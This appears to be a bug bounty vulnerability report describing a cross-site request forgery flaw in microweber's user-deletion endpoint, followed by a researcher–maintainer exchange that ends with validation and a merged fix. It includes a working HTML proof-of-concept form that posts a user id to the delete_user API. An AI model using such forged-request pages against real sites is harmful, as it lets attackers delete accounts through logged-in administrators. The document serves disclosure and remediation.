Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021


✍️ Description

Attacker able to delete any user if knows the user id parameter value.

🕵️‍♂️ Proof of Concept

Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the user with id 3 has been deleted.

//PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/delete_user" method="POST">
<input type="hidden" name="id" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

Here a user with id value 3 will be deleted after clicking on submit button. 📍 Location app.js#L1

We have contacted a member of the microweber team and are waiting to hear back 10 months ago
amammad
10 months ago

Researcher


Hey microweber team , can you give some feedbacks to me? thanks so much.

Peter Ivanov has invalidated this vulnerability 10 months ago

You need to be logged as admin to make this action

The disclosure bounty has been dropped
The fix bounty has been dropped
amammad
10 months ago

Researcher


Yah the main action of any CSRF attack is that users must be logged in before, excuse me for my bad explanation but this is CSRF and already assigned a CWE to it.

amammad
10 months ago

Researcher


You can set Strict value on SameSite attribute of just one of your cookies and then anybody won't able to perform any CSRF attacks.

Peter Ivanov
10 months ago

Maintainer


Hello Thanks for info

Yes you are correct some 3rd party domain can trick you

This makes a valid issue and we will look how to fix it

Will update you soon

amammad
10 months ago

Researcher


aaahhh thank you sir i was doubting to my experience :))

can you just look at some other reports and validate them too ( they will be hidden until you make a fix for them)

amammad
10 months ago

Researcher


@admin can you change the status of this report like before?

Jamie Slome
10 months ago

Admin


@amammad @peter - I have updated the status of this report to pending. Feel free to mark as valid if you see fit.

Peter Ivanov validated this vulnerability 10 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2fa9a6 3 months ago
Peter Ivanov has been awarded the fix bounty
to join this conversation